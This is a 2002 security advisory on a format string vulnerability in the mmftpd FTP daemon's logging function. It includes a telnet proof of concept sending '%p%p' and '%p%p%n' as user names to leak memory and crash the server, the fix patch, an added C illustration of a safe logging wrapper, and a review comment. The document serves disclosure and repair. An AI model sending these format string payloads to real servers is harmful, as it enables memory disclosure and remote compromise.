[UNIX] mmftpd FTP Daemon Format String Vulnerability

From: support@securiteam.com
Date: 06/13/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 13 Jun 2002 07:34:27 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  mmftpd FTP Daemon Format String Vulnerability
------------------------------------------------------------------------

SUMMARY

mmftpd <http://freshmeat.net/projects/mmftpd/> is a secure FTP server
that runs as a normal user, and supports virtual users only. Each user may
have specific permissions, including the maximum home directory size limit
and download/upload speeds. It runs on both BSD and Linux systems, and is
ideal for a setup with many Web virtual host customers. It was written
from scratch, with no borrowed code.

The intexxia laboratory found a remotely exploitable format string
vulnerability in the mmftpd FTP daemon.

DETAILS

Vulnerable systems:
 * mmftpd version 0.0.7 and prior

Immune systems:
 * mmftpd version 0.0.8

There is a format string vulnerability in the 'mmsyslog()' function of the
'mmftpd' program. This function acts like 'vsyslog()' if '__GLIBC__' is
defined. It first formats the log message into a buffer and then passes
that buffer to 'syslog(3)' as the format string, so the format string can
be defined by a remote user. Authentication is not required to exploit
this vulnerability.
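
The double formatting described above, shown as an added example that is not mmftpd's own code: the fixed wrapper hands the buffer to the sink as data, and a small checker reports which conversions a second printf-style pass would have acted on. The names `fake_syslog`, `log_fixed`, `live_directives`, the in-memory sink standing in for syslog(3), and the "Failed login for %s (unexisting)" format are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed stand-in for syslog(3): takes a printf-style format like syslog()
 * does, but writes to memory so the result can be inspected. */
char sink_line[1024];
void fake_syslog(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(sink_line, sizeof sink_line, fmt, ap);
    va_end(ap);
}

/* Fixed wrapper: pass 1 expands the caller's trusted format; the result
 * is then given to the sink as an argument of a constant "%s". */
void log_fixed(const char *fmt, ...)
{
    char buf[1024];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    fake_syslog("%s", buf); /* flawed pattern would be: fake_syslog(buf) */
}

/* Count conversions a second formatting pass would interpret ("%%" is a
 * literal percent). *has_n is set when a %n (memory write) is present. */
int live_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        const char *p = s + 1;  /* skip flags, width, precision, length */
        while (*p && strchr("-+ #0123456789.*hlLqjzt$", *p)) p++;
        if (*p == '\0') break;
        if (*p == 'n') *has_n = 1;
        count++;
        s = p;
    }
    return count;
}

int main(void)
{
    int has_n;
    log_fixed("Failed login for %s (unexisting)", "%p%p%n"); /* constructed input */
    printf("%s -> %d live directives\n", sink_line, live_directives(sink_line, &has_n));
    return 0;
}
```

With the fixed wrapper the user name reaches the log verbatim; the checker can be run over strings headed for any printf-style sink during an audit.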

Successful exploitation of this flaw can allow a remote user to obtain a
local account on the target machine.

Proof of concept:
test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login

In the log file:
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused

Solution:
The following patch corrects this issue:

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
     }
 }
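
Review bot: this hunk covers only one branch of mmsyslog() (the nested closing brace after the syslog() call, together with the advisory's remark about '__GLIBC__', points to a conditional around it), so the other branch should be checked to confirm it never hands a pre-formatted buffer to a function that parses it as a format. In the context line `vsnprintf(buf, 1023, fmt, lst);` the length is hard-coded while the declaration of buf is not visible here; `sizeof(buf)` would keep the bound tied to the buffer. The changed line itself, with the constant "%s" format and buf as its argument, is the right form for the sink.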

A new version including this patch is available at the following URL:
<http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz>

Vendor status:
04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew responded very quickly and confirmed the vulnerability.
He released a new version.

ADDITIONAL INFORMATION

The information has been provided by Benoît Roussel
<mailto:benoit.roussel@intexxia.com>.
